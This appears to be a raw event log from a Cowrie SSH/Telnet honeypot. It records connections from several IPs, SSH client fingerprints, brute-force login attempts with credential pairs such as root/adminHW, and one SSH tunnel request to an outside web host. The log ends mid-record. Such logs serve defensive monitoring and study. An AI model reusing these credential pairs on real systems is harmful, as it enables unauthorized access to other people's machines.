{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:08:53.714845Z","src_ip":"217.72.205.35","session":"9ef9483c57cc"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":42154,"dst_ip":"1.2.3.4","dst_port":23,"session":"966319504f8e","protocol":"telnet","message":"New connection: 79.124.8.120:42154 (1.2.3.4:23) [session: 966319504f8e]","sensor":"my-vps","timestamp":"2025-09-09T09:09:16.304550Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:09:16.344258Z","src_ip":"79.124.8.120","session":"966319504f8e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:09:16.367578Z","src_ip":"79.124.8.120","session":"966319504f8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63680,"dst_ip":"1.2.3.4","dst_port":23,"session":"60f4ba2f015a","protocol":"telnet","message":"New connection: 212.227.235.229:63680 (1.2.3.4:23) [session: 60f4ba2f015a]","sensor":"my-vps","timestamp":"2025-09-09T09:09:20.842625Z"}
{"eventid":"cowrie.session.closed","duration":13.264919519424438,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:09:34.107482Z","src_ip":"212.227.235.229","session":"60f4ba2f015a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50248,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ee669be5912","protocol":"ssh","message":"New connection: 212.227.125.160:50248 (1.2.3.4:22) [session: 4ee669be5912]","sensor":"my-vps","timestamp":"2025-09-09T09:09:44.264170Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:09:44.325126Z","src_ip":"212.227.125.160","session":"4ee669be5912"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58724,"dst_ip":"1.2.3.4","dst_port":23,"session":"a0f5d6522fb3","protocol":"telnet","message":"New connection: 212.227.235.229:58724 (1.2.3.4:23) [session: a0f5d6522fb3]","sensor":"my-vps","timestamp":"2025-09-09T09:11:06.632964Z"}
{"eventid":"cowrie.session.closed","duration":13.786678791046143,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:11:20.419572Z","src_ip":"212.227.235.229","session":"a0f5d6522fb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45482,"dst_ip":"1.2.3.4","dst_port":23,"session":"76d6fc53608a","protocol":"telnet","message":"New connection: 212.227.125.160:45482 (1.2.3.4:23) [session: 76d6fc53608a]","sensor":"my-vps","timestamp":"2025-09-09T09:12:13.467647Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:12:16.371559Z","src_ip":"79.124.8.120","session":"966319504f8e"}
{"eventid":"cowrie.session.closed","duration":180.07211899757385,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:12:16.376596Z","src_ip":"79.124.8.120","session":"966319504f8e"}
{"eventid":"cowrie.session.closed","duration":31.436582565307617,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:12:44.904166Z","src_ip":"212.227.125.160","session":"76d6fc53608a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35740,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3d79fef82c5","protocol":"ssh","message":"New connection: 212.227.125.160:35740 (1.2.3.4:22) [session: a3d79fef82c5]","sensor":"my-vps","timestamp":"2025-09-09T09:15:01.203353Z"}
{"eventid":"cowrie.session.closed","duration":"26.4","message":"Connection lost after 26.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:15:27.564214Z","src_ip":"212.227.125.160","session":"a3d79fef82c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51912,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b1861e06c15","protocol":"ssh","message":"New connection: 212.227.125.160:51912 (1.2.3.4:22) [session: 0b1861e06c15]","sensor":"my-vps","timestamp":"2025-09-09T09:15:28.067885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.7.4","message":"Remote SSH version: SSH-2.0-libssh_0.7.4","sensor":"my-vps","timestamp":"2025-09-09T09:15:28.995656Z","src_ip":"212.227.125.160","session":"0b1861e06c15"}
{"eventid":"cowrie.client.kex","hassh":"e37f354a101aff5871ba233aa82b84ec","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e37f354a101aff5871ba233aa82b84ec","sensor":"my-vps","timestamp":"2025-09-09T09:15:29.461944Z","src_ip":"212.227.125.160","session":"0b1861e06c15"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:15:31.946743Z","src_ip":"212.227.125.160","session":"0b1861e06c15"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53990,"dst_ip":"1.2.3.4","dst_port":22,"session":"82a0ccb0e902","protocol":"ssh","message":"New connection: 217.72.205.35:53990 (1.2.3.4:22) [session: 82a0ccb0e902]","sensor":"my-vps","timestamp":"2025-09-09T09:15:37.460756Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:15:37.461882Z","src_ip":"217.72.205.35","session":"82a0ccb0e902"}
{"eventid":"cowrie.session.connect","src_ip":"137.184.179.27","src_port":57638,"dst_ip":"1.2.3.4","dst_port":22,"session":"54cc097e30f7","protocol":"ssh","message":"New connection: 137.184.179.27:57638 (1.2.3.4:22) [session: 54cc097e30f7]","sensor":"my-vps","timestamp":"2025-09-09T09:17:23.315188Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T09:17:23.316034Z","src_ip":"137.184.179.27","session":"54cc097e30f7"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T09:17:23.473917Z","src_ip":"137.184.179.27","session":"54cc097e30f7"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:17:23.955934Z","src_ip":"137.184.179.27","session":"54cc097e30f7"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:17:24.268400Z","src_ip":"137.184.179.27","session":"54cc097e30f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46260,"dst_ip":"1.2.3.4","dst_port":22,"session":"abd416a10cca","protocol":"ssh","message":"New connection: 212.227.125.160:46260 (1.2.3.4:22) [session: abd416a10cca]","sensor":"my-vps","timestamp":"2025-09-09T09:17:40.233799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T09:17:43.515020Z","src_ip":"212.227.125.160","session":"abd416a10cca"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T09:17:43.516129Z","src_ip":"212.227.125.160","session":"abd416a10cca"}
{"eventid":"cowrie.login.success","username":"root","password":"kjashd123sadhj123d1SS","message":"login attempt [root/kjashd123sadhj123d1SS] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:17:53.238506Z","src_ip":"212.227.125.160","session":"abd416a10cca"}
{"eventid":"cowrie.session.closed","duration":"15.1","message":"Connection lost after 15.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:17:55.373350Z","src_ip":"212.227.125.160","session":"abd416a10cca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33124,"dst_ip":"1.2.3.4","dst_port":23,"session":"8a6ff67af58c","protocol":"telnet","message":"New connection: 212.227.125.160:33124 (1.2.3.4:23) [session: 8a6ff67af58c]","sensor":"my-vps","timestamp":"2025-09-09T09:22:04.789675Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54342,"dst_ip":"1.2.3.4","dst_port":22,"session":"f01cb8747e7c","protocol":"ssh","message":"New connection: 217.72.205.35:54342 (1.2.3.4:22) [session: f01cb8747e7c]","sensor":"my-vps","timestamp":"2025-09-09T09:22:11.368794Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:22:11.369936Z","src_ip":"217.72.205.35","session":"f01cb8747e7c"}
{"eventid":"cowrie.session.closed","duration":31.396845817565918,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:22:36.186451Z","src_ip":"212.227.125.160","session":"8a6ff67af58c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54376,"dst_ip":"1.2.3.4","dst_port":22,"session":"29e1a27bef03","protocol":"ssh","message":"New connection: 212.227.125.160:54376 (1.2.3.4:22) [session: 29e1a27bef03]","sensor":"my-vps","timestamp":"2025-09-09T09:23:19.904038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T09:23:19.907750Z","src_ip":"212.227.125.160","session":"29e1a27bef03"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T09:23:19.964077Z","src_ip":"212.227.125.160","session":"29e1a27bef03"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-09-09T09:23:20.202277Z","src_ip":"212.227.125.160","session":"29e1a27bef03"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:23:21.263600Z","src_ip":"212.227.125.160","session":"29e1a27bef03"}
{"eventid":"cowrie.session.connect","src_ip":"120.79.98.154","src_port":49836,"dst_ip":"1.2.3.4","dst_port":22,"session":"90a8f916993d","protocol":"ssh","message":"New connection: 120.79.98.154:49836 (1.2.3.4:22) [session: 90a8f916993d]","sensor":"my-vps","timestamp":"2025-09-09T09:24:16.292250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T09:24:16.293153Z","src_ip":"120.79.98.154","session":"90a8f916993d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T09:24:16.504302Z","src_ip":"120.79.98.154","session":"90a8f916993d"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:24:24.293637Z","src_ip":"120.79.98.154","session":"90a8f916993d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":28654,"dst_ip":"1.2.3.4","dst_port":22,"session":"f96b55ac26bf","protocol":"ssh","message":"New connection: 212.227.125.160:28654 (1.2.3.4:22) [session: f96b55ac26bf]","sensor":"my-vps","timestamp":"2025-09-09T09:24:41.074853Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:24:41.076014Z","src_ip":"212.227.125.160","session":"f96b55ac26bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":28924,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c64513e92a9","protocol":"ssh","message":"New connection: 212.227.125.160:28924 (1.2.3.4:22) [session: 9c64513e92a9]","sensor":"my-vps","timestamp":"2025-09-09T09:24:41.188174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T09:24:41.189037Z","src_ip":"212.227.125.160","session":"9c64513e92a9"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T09:24:41.301252Z","src_ip":"212.227.125.160","session":"9c64513e92a9"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:24:41.643111Z","src_ip":"212.227.125.160","session":"9c64513e92a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T09:24:41.756104Z","session":"9c64513e92a9"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:25:51.187857Z","src_ip":"212.227.125.160","session":"9c64513e92a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"c799c9ea4e57","protocol":"ssh","message":"New connection: 212.227.125.160:64001 (1.2.3.4:22) [session: c799c9ea4e57]","sensor":"my-vps","timestamp":"2025-09-09T09:28:40.512973Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:28:40.568747Z","src_ip":"212.227.125.160","session":"c799c9ea4e57"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58560,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad292453cafc","protocol":"ssh","message":"New connection: 217.72.205.35:58560 (1.2.3.4:22) [session: ad292453cafc]","sensor":"my-vps","timestamp":"2025-09-09T09:29:00.954063Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:29:00.955347Z","src_ip":"217.72.205.35","session":"ad292453cafc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58531,"dst_ip":"1.2.3.4","dst_port":23,"session":"a7dab25a8ce1","protocol":"telnet","message":"New connection: 212.227.235.229:58531 (1.2.3.4:23) [session: a7dab25a8ce1]","sensor":"my-vps","timestamp":"2025-09-09T09:30:33.835077Z"}
{"eventid":"cowrie.session.closed","duration":120.01602339744568,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:32:33.851004Z","src_ip":"212.227.235.229","session":"a7dab25a8ce1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"969a80390fdd","protocol":"ssh","message":"New connection: 212.227.235.229:64001 (1.2.3.4:22) [session: 969a80390fdd]","sensor":"my-vps","timestamp":"2025-09-09T09:34:09.926933Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:34:10.026716Z","src_ip":"212.227.235.229","session":"969a80390fdd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54334,"dst_ip":"1.2.3.4","dst_port":23,"session":"1de590853a83","protocol":"telnet","message":"New connection: 212.227.125.160:54334 (1.2.3.4:23) [session: 1de590853a83]","sensor":"my-vps","timestamp":"2025-09-09T09:34:18.283525Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:34:18.369066Z","src_ip":"212.227.125.160","session":"1de590853a83"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:34:18.390450Z","src_ip":"212.227.125.160","session":"1de590853a83"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58160,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b3a8ed65867","protocol":"ssh","message":"New connection: 217.72.205.35:58160 (1.2.3.4:22) [session: 5b3a8ed65867]","sensor":"my-vps","timestamp":"2025-09-09T09:35:28.872075Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:35:28.873142Z","src_ip":"217.72.205.35","session":"5b3a8ed65867"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"185.2","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 185.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:37:23.549083Z","src_ip":"212.227.125.160","session":"1de590853a83"}
{"eventid":"cowrie.session.closed","duration":185.27429151535034,"message":"Connection lost after 185 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:37:23.557745Z","src_ip":"212.227.125.160","session":"1de590853a83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43718,"dst_ip":"1.2.3.4","dst_port":22,"session":"347069589079","protocol":"ssh","message":"New connection: 212.227.235.229:43718 (1.2.3.4:22) [session: 347069589079]","sensor":"my-vps","timestamp":"2025-09-09T09:37:56.251714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2","message":"Remote SSH version: SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2","sensor":"my-vps","timestamp":"2025-09-09T09:37:56.257310Z","src_ip":"212.227.235.229","session":"347069589079"}
{"eventid":"cowrie.client.kex","hassh":"aae6b9604f6f3356543709a376d7f657","hasshAlgorithms":"sntrup761x25519-sha512@openssh.com,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["sntrup761x25519-sha512@openssh.com","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh